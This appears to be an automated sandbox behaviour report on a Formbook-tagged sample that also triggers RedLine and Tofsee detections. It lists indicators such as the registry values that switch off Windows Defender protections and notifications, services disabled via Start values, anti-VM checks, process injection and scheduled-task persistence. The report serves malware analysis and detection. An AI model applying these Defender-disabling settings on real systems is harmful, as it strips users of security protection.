formbook | 3a2e31f2844df5cb91eedbf24c0b93de4b0aa08525f733132c2bce0d7ab81acc

Modify Existing Service

Disabling Security Tools

Processes:

PowerRun.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	PowerRun.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	PowerRun.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRoutinelyTakingAction = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning = "1"	reg.exe

Modifies Windows Defender notification settings 3 TTPs 4 IoCs

evasion trojan

Modify Existing Service

Modify Registry

Disabling Security Tools

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1"	reg.exe

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

Modify Existing Service

Processes:

xosefpx.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	xosefpx.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4"	reg.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 18 IoCs

Processes:

resource	yara_rule
behavioral1/memory/4052-1609-0x0000000005300000-0x0000000005344000-memory.dmp	family_redline
behavioral1/memory/4052-1612-0x0000000005300000-0x0000000005344000-memory.dmp	family_redline
behavioral1/memory/4052-1608-0x0000000005300000-0x0000000005344000-memory.dmp	family_redline
behavioral1/memory/4052-1617-0x0000000005300000-0x0000000005344000-memory.dmp	family_redline
behavioral1/memory/4052-1626-0x0000000005300000-0x0000000005344000-memory.dmp	family_redline
behavioral1/memory/4052-1632-0x0000000005300000-0x0000000005344000-memory.dmp	family_redline
behavioral1/memory/4052-1636-0x0000000005300000-0x0000000005344000-memory.dmp	family_redline
behavioral1/memory/4052-1641-0x0000000005300000-0x0000000005344000-memory.dmp	family_redline
behavioral1/memory/4052-1645-0x0000000005300000-0x0000000005344000-memory.dmp	family_redline
behavioral1/memory/4052-1649-0x0000000005300000-0x0000000005344000-memory.dmp	family_redline
behavioral1/memory/4052-1666-0x0000000005300000-0x0000000005344000-memory.dmp	family_redline
behavioral1/memory/4052-1670-0x0000000005300000-0x0000000005344000-memory.dmp	family_redline
behavioral1/memory/4052-1660-0x0000000005300000-0x0000000005344000-memory.dmp	family_redline
behavioral1/memory/4052-1654-0x0000000005300000-0x0000000005344000-memory.dmp	family_redline
behavioral1/memory/4052-1674-0x0000000005300000-0x0000000005344000-memory.dmp	family_redline
behavioral1/memory/4052-1678-0x0000000005300000-0x0000000005344000-memory.dmp	family_redline
behavioral1/memory/4052-1682-0x0000000005300000-0x0000000005344000-memory.dmp	family_redline
behavioral1/memory/4052-1687-0x0000000005300000-0x0000000005344000-memory.dmp	family_redline

Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee

Formbook payload 4 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/1708-1661-0x0000000000400000-0x000000000042F000-memory.dmp	formbook
behavioral1/memory/1708-1697-0x0000000000400000-0x000000000042F000-memory.dmp	formbook
behavioral1/memory/4640-1860-0x0000000000C10000-0x0000000000C3F000-memory.dmp	formbook
behavioral1/memory/4640-2307-0x0000000000C10000-0x0000000000C3F000-memory.dmp	formbook

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

MicrosoftEdgeUpdate.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ MicrosoftEdgeUpdate.exe
Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file
Modifies Windows Firewall 1 TTPs 2 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exenetsh.exe

pid process

4832 netsh.exe
2020 netsh.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	MicrosoftEdgeUpdate.exe

pid	process
4832	netsh.exe
2020	netsh.exe

ACProtect 1.3x - 1.4x DLL software 1 IoCs

Detects file using ACProtect software.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\SelfDel.dll	acprotect

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

MicrosoftEdgeUpdate.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	MicrosoftEdgeUpdate.exe

Executes dropped EXE 63 IoCs

Processes:

0bea9e772ca21798cb2eaaf2ad5d05e403b8182756be5f74ac83dd25f2d8dacf.exe0c1e5acd77d667335c59b10f7bd08997ff5bac4aeb52722fffe17c60d1779553.exe0be395d43c98fe7b2d0fff10863410665ee11ce31a10277dc03049e77661b1ca.exejazvc.exejazvc.exe0f9b1a70b9f5dae682e68e8f0b01f3268013721d4d4fbff9d128268a511f775d.exeIBInstaller_98220.exeIBInstaller_98220.tmpsetup.exereg.execmd.exeConhost.exeSetACL32.exeSetACL32.exeSetACL32.exereg.exereg.exereg.exesphybwtjm.exereg.exePowerRun.exereg.exereg.exereg.exePowerRun.exePowerRun64.exePowerRun.exeWerFault.exePowerRun.exePowerRun.exePowerRun.exePowerRun.exePowerRun.exePowerRun.exePowerRun64.exePowerRun.exePowerRun.exePowerRun.exePowerRun.exePowerRun.exePowerRun64.exePowerRun.exehkteeaax.exePowerRun.exePowerRun.exe1f8079a460be76dad49a59bce35a7620f3372bddc03e73cb8003439c87bf8566.exetaskmgr.exemsedge.exePowerRun.exePowerRun.exePowerRun.exePowerRun.exereg.exePowerRun.exeWerFault.exe3e7caf8f94fd32156a127a2c4fd150003b1e68935e7c8fa1afe46c865145a9b6.exeMicrosoftEdgeUpdate.exePowerRun.exePowerRun.execmd.exe

pid	process
4052	0bea9e772ca21798cb2eaaf2ad5d05e403b8182756be5f74ac83dd25f2d8dacf.exe
4572	0c1e5acd77d667335c59b10f7bd08997ff5bac4aeb52722fffe17c60d1779553.exe
4024	0be395d43c98fe7b2d0fff10863410665ee11ce31a10277dc03049e77661b1ca.exe
4276	jazvc.exe
1708	jazvc.exe
4920	0f9b1a70b9f5dae682e68e8f0b01f3268013721d4d4fbff9d128268a511f775d.exe
656	IBInstaller_98220.exe
2620	IBInstaller_98220.tmp
1664	setup.exe
4088	reg.exe
184	cmd.exe
3956	Conhost.exe
4824	SetACL32.exe
1796	SetACL32.exe
3760	SetACL32.exe
3000	reg.exe
4932	reg.exe
2920	reg.exe
5100	sphybwtjm.exe
2020	reg.exe
1828	PowerRun.exe
5020	reg.exe
4600	reg.exe
2752	reg.exe
1788	PowerRun.exe
3600	PowerRun64.exe
436	PowerRun.exe
2244	WerFault.exe
3328	PowerRun.exe
4940	PowerRun.exe
4372	PowerRun.exe
5040	PowerRun.exe
5008	PowerRun.exe
4332	PowerRun.exe
4272	PowerRun64.exe
220	PowerRun.exe
1852	PowerRun.exe
2216	PowerRun.exe
1300	PowerRun.exe
1744	PowerRun.exe
4576	PowerRun64.exe
2208	PowerRun.exe
1540	hkteeaax.exe
2300	PowerRun.exe
4256	PowerRun.exe
1588	1f8079a460be76dad49a59bce35a7620f3372bddc03e73cb8003439c87bf8566.exe
4940	PowerRun.exe
3872	taskmgr.exe
4580	msedge.exe
1780	PowerRun.exe
3356	PowerRun.exe
4000	PowerRun.exe
4048	PowerRun.exe
4496	reg.exe
2828	PowerRun.exe
1116	WerFault.exe
464	3e7caf8f94fd32156a127a2c4fd150003b1e68935e7c8fa1afe46c865145a9b6.exe
3688	MicrosoftEdgeUpdate.exe
3856	PowerRun.exe
772
1800	PowerRun.exe
2528	cmd.exe
2132

Loads dropped DLL 6 IoCs

Processes:

0f9b1a70b9f5dae682e68e8f0b01f3268013721d4d4fbff9d128268a511f775d.exeIBInstaller_98220.tmpsetup.exe

pid	process
4920	0f9b1a70b9f5dae682e68e8f0b01f3268013721d4d4fbff9d128268a511f775d.exe
4920	0f9b1a70b9f5dae682e68e8f0b01f3268013721d4d4fbff9d128268a511f775d.exe
4920	0f9b1a70b9f5dae682e68e8f0b01f3268013721d4d4fbff9d128268a511f775d.exe
2620	IBInstaller_98220.tmp
4920	0f9b1a70b9f5dae682e68e8f0b01f3268013721d4d4fbff9d128268a511f775d.exe
1664	setup.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\SelfDel.dll	upx

Windows security modification 2 TTPs 3 IoCs

evasion trojan

Disabling Security Tools

Modify Registry

Processes:

PowerRun.exePowerRun.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\DisableAntiVirus = "1"	PowerRun.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	PowerRun.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "4"	PowerRun.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

MicrosoftEdgeUpdate.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA MicrosoftEdgeUpdate.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

847 ipinfo.io
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

MicrosoftEdgeUpdate.exe

pid process

3688 MicrosoftEdgeUpdate.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	MicrosoftEdgeUpdate.exe

flow	ioc
847	ipinfo.io

pid	process
3688	MicrosoftEdgeUpdate.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

jazvc.exejazvc.exehelp.exereg.exe

description	pid	process	target process
PID 4276 set thread context of 1708	4276	jazvc.exe	jazvc.exe
PID 1708 set thread context of 3108	1708	jazvc.exe	Explorer.EXE
PID 4640 set thread context of 3108	4640	help.exe	Explorer.EXE
PID 5020 set thread context of 4580	5020	reg.exe	msedge.exe

Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exe

pid process

2572 sc.exe
2800 sc.exe
2096 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
2572	sc.exe
2800	sc.exe
2096	sc.exe

Program crash 13 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4484	4908	WerFault.exe
4892	4088	WerFault.exe	0edd5342b1fc252b5164f41118b0b0e69d954772a4ec6ee14f49d15fa4ddf66d.exe
2244	5100	WerFault.exe	0f4450a6b298d95d7fdd6ac63a917b1975221fe90e520ff30e9c6b0d8a4955b6.exe
4544	4580	WerFault.exe	1c1b31ad0a3391ee125f6072e76ec6a5c6305fdc5ca740bcac1ae2a3be767a22.exe
2912	1540	WerFault.exe	hkteeaax.exe
3604	1412	WerFault.exe	5bfc5adc36e614220e723f03a499372a525bccb1719f621b6edc52d2d2737e32.exe
1264	5100	WerFault.exe	sphybwtjm.exe
7488	4960	WerFault.exe	SearchApp.exe
9252	9504	WerFault.exe	SearchApp.exe
5600	3924	WerFault.exe	SearchApp.exe
1116	8796	WerFault.exe	SearchApp.exe
9656	6696	WerFault.exe	SearchApp.exe
8236	2028

NSIS installer 12 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\Desktop\2022-10-24\7811964f7f93c1fa2c2b19650be4055f2b4903d398b0f24b2083315515007582.exe	nsis_installer_1
C:\Users\Admin\Desktop\2022-10-24\7811964f7f93c1fa2c2b19650be4055f2b4903d398b0f24b2083315515007582.exe	nsis_installer_2
C:\Users\Admin\Desktop\2022-10-24\0be395d43c98fe7b2d0fff10863410665ee11ce31a10277dc03049e77661b1ca.exe	nsis_installer_1
C:\Users\Admin\Desktop\2022-10-24\0be395d43c98fe7b2d0fff10863410665ee11ce31a10277dc03049e77661b1ca.exe	nsis_installer_2
C:\Users\Admin\Desktop\2022-10-24\0be395d43c98fe7b2d0fff10863410665ee11ce31a10277dc03049e77661b1ca.exe	nsis_installer_1
C:\Users\Admin\Desktop\2022-10-24\0be395d43c98fe7b2d0fff10863410665ee11ce31a10277dc03049e77661b1ca.exe	nsis_installer_2
C:\Users\Admin\AppData\Local\Temp\nsy300B.tmp\setup.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\nsy300B.tmp\setup.exe	nsis_installer_2
C:\Users\Admin\AppData\Local\Temp\nsy300B.tmp\setup.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\nsy300B.tmp\setup.exe	nsis_installer_2
C:\Users\Admin\Desktop\2022-10-24\1bcbf1dce6780dbfb1b1ad1d86f25d4b7a50063be5b4640f8939085980c4e00c.exe	nsis_installer_1
C:\Users\Admin\Desktop\2022-10-24\1bcbf1dce6780dbfb1b1ad1d86f25d4b7a50063be5b4640f8939085980c4e00c.exe	nsis_installer_2

Creates scheduled task(s) 1 TTPs 15 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
3312	schtasks.exe
6728	schtasks.exe
6264	schtasks.exe
5936	schtasks.exe
6808	schtasks.exe
6360	schtasks.exe
5336	schtasks.exe
5712	schtasks.exe
5220	schtasks.exe
492	schtasks.exe
5220	schtasks.exe
996	schtasks.exe
3008	schtasks.exe
5740	schtasks.exe
4828	schtasks.exe

Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

6196 taskkill.exe
8892 taskkill.exe
1224 taskkill.exe
4472

pid	process
6196	taskkill.exe
8892	taskkill.exe
1224	taskkill.exe
4472

Modifies data under HKEY_USERS 50 IoCs

Processes:

PowerRun.exePowerRun.exereg.exeWerFault.exePowerRun.exePowerRun.exePowerRun.exePowerRun.exePowerRun.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	PowerRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WerFault.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PowerRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	PowerRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	WerFault.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	PowerRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PowerRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	WerFault.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	PowerRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	WerFault.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	PowerRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	WerFault.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"

Modifies registry class 2 IoCs

Processes:

Explorer.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

jazvc.exehelp.exereg.exePowerRun.exereg.exePowerRun.exePowerRun64.exePowerRun.exePowerRun.exePowerRun.exePowerRun.exePowerRun64.exePowerRun.exePowerRun.exe

pid	process
1708	jazvc.exe
1708	jazvc.exe
1708	jazvc.exe
1708	jazvc.exe
4640	help.exe
4640	help.exe
4640	help.exe
4640	help.exe
4640	help.exe
4640	help.exe
4640	help.exe
4640	help.exe
4640	help.exe
4640	help.exe
4640	help.exe
4640	help.exe
4640	help.exe
4640	help.exe
2020	reg.exe
2020	reg.exe
2020	reg.exe
2020	reg.exe
1828	PowerRun.exe
1828	PowerRun.exe
4600	reg.exe
4600	reg.exe
1828	PowerRun.exe
1828	PowerRun.exe
4600	reg.exe
4600	reg.exe
1788	PowerRun.exe
1788	PowerRun.exe
3600	PowerRun64.exe
3600	PowerRun64.exe
3600	PowerRun64.exe
3600	PowerRun64.exe
1788	PowerRun.exe
1788	PowerRun.exe
436	PowerRun.exe
436	PowerRun.exe
436	PowerRun.exe
436	PowerRun.exe
3328	PowerRun.exe
3328	PowerRun.exe
3328	PowerRun.exe
3328	PowerRun.exe
5040	PowerRun.exe
5040	PowerRun.exe
5040	PowerRun.exe
5040	PowerRun.exe
4332	PowerRun.exe
4332	PowerRun.exe
4272	PowerRun64.exe
4272	PowerRun64.exe
4272	PowerRun64.exe
4272	PowerRun64.exe
4332	PowerRun.exe
4332	PowerRun.exe
220	PowerRun.exe
220	PowerRun.exe
2216	PowerRun.exe
2216	PowerRun.exe
220	PowerRun.exe
220	PowerRun.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3108 Explorer.EXE
Suspicious behavior: MapViewOfSection 6 IoCs

Processes:

jazvc.exejazvc.exehelp.exe

pid process

4276 jazvc.exe
1708 jazvc.exe
1708 jazvc.exe
1708 jazvc.exe
4640 help.exe
4640 help.exe

pid	process
4276	jazvc.exe
1708	jazvc.exe
1708	jazvc.exe
1708	jazvc.exe
4640	help.exe
4640	help.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

7zG.exe7zG.exe0bea9e772ca21798cb2eaaf2ad5d05e403b8182756be5f74ac83dd25f2d8dacf.exe0c1e5acd77d667335c59b10f7bd08997ff5bac4aeb52722fffe17c60d1779553.exejazvc.exehelp.exeExplorer.EXE

description	pid	process
Token: SeRestorePrivilege	4540	7zG.exe
Token: 35	4540	7zG.exe
Token: SeSecurityPrivilege	4540	7zG.exe
Token: SeSecurityPrivilege	4540	7zG.exe
Token: SeRestorePrivilege	572	7zG.exe
Token: 35	572	7zG.exe
Token: SeSecurityPrivilege	572	7zG.exe
Token: SeSecurityPrivilege	572	7zG.exe
Token: SeDebugPrivilege	4052	0bea9e772ca21798cb2eaaf2ad5d05e403b8182756be5f74ac83dd25f2d8dacf.exe
Token: SeDebugPrivilege	4572	0c1e5acd77d667335c59b10f7bd08997ff5bac4aeb52722fffe17c60d1779553.exe
Token: SeDebugPrivilege	1708	jazvc.exe
Token: SeDebugPrivilege	4640	help.exe
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
